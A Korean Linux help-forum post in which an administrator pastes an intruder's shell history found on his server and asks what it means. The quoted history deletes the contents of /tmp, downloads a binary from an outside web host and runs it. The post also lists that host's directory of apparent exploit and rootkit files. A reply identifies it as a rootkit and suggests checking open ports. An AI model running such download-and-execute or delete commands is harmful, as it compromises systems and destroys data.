질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

아래 /tmp... 에 답해주셔서 감사하며...

작성자 정보

  • 힘들다 작성
  • 작성일

컨텐츠 정보

본문

/var/tmp 안에 .bash_history라는 파일로 아래와같이 적혀있읍니다.

cd /tmp
ls -a
rm -rf *
uname -a
wget http://www.ecidade.com.br/images/xpl/brk
chmod 777 brk
./brk

/tmp 안에 내용을 삭제하니 mysql 이 작동이 안되더라고요

그리고 이상한 파일,폴더가 생성되어 작동하고요. 

그리고 위 주소http://www.ecidade.com.br/images/xpl에 가니 아래 화면이 뜨는군요.

이거 뭡니까???

이거 크래킹 하는 거 아닌가요...

############################################################
Index of /images/xpl
 Name                    Last modified       Size  Description
--------------------------------------------------------------------------------
 Parent Directory        11-Jan-2006 10:39      - 
 a1ts.sh                 22-Jun-2005 14:36     2k 
 bdSUN                   30-Jun-2005 16:27    14k 
 brk                     20-Mar-2005 12:59   457k 
 cgi                     20-Mar-2005 12:56    17k 
 cmd.dat                 05-Sep-2005 18:23    26k 
 crond                   16-Oct-2005 12:22    23k 
 cse.gif                 28-Mar-2005 18:11    26k 
 dc                      04-Apr-2005 14:48    14k 
 deloger                 05-Apr-2005 16:07     8k 
 djs.txt                 16-Jul-2005 05:46     2k 
 dupa.txt                28-Aug-2005 17:58     1k 
 elf109                  06-Mar-2005 03:15   436k 
 elflbl                  04-Apr-2005 14:48    28k 
 f3                      22-Mar-2005 17:23    22k 
 file.jpg                06-Dec-2005 00:16     5k 
 in.txt                  08-May-2005 16:42     1k 
 k-rad3                  03-Jan-2006 21:22   500k 
 kapiax                  25-Sep-2005 01:57    25k 
 kmd                     21-Oct-2005 09:35     1k 
 kmod2                   04-Apr-2005 14:48    19k 
 krad                    04-Apr-2005 14:48    16k 
 lila.jpg                19-Jan-2005 02:58     1k 
 local24                 16-Oct-2005 12:21   420k 
 local26                 16-Oct-2005 12:22   461k 
 mac                     28-Mar-2005 13:19    15k 
 mac.zip                 25-Sep-2005 12:03     9k 
 mkmod                   28-Jun-2005 11:38   536k 
 mremap                  05-Apr-2005 16:16     9k 
 mremap_pte              05-Apr-2005 16:17   452k 
 nc                      04-Sep-2005 13:12    18k 
 newlocal                03-Aug-2005 13:49    17k 
 pro18.txt               12-Nov-2005 16:57    13k 
 pt                      30-Jun-2005 16:34    19k 
 pte                     10-Oct-2005 03:38   452k 
 ptrace                  04-Apr-2005 14:49    17k 
 ptrace24                04-Apr-2005 14:49    15k 
 shv5.tar.gz             04-Apr-2005 14:54   647k 
 st3                     25-Sep-2005 02:16    13k 
 stackgrow2              28-Jun-2005 11:14    16k 
 sun8                    15-Jul-2005 15:49     9k 
 sun8_2                  15-Jul-2005 15:49    13k 
 sun8_3                  15-Jul-2005 15:49    16k 
 sun8_4                  15-Jul-2005 15:49    16k 
 uselib24                04-Apr-2005 14:55    20k 
 w00t                    04-Apr-2005 14:56   458k 
 zone.pl                 10-Jan-2006 17:33     1k 

관련자료

댓글 1

김기환님의 댓글

  • 김기환
  • 작성일
rootkit 입니다. 당근 삭제 하시고,
현재 열려있는 포트확인해보시고 죽여주셔야할것 같네요

netstat -nlp 하시면 이상한 포트가 열려 있을것으로 보이네요.

공지사항


뉴스광장


  • 현재 회원수 :  60,043 명
  • 현재 강좌수 :  35,853 개
  • 현재 접속자 :  73 명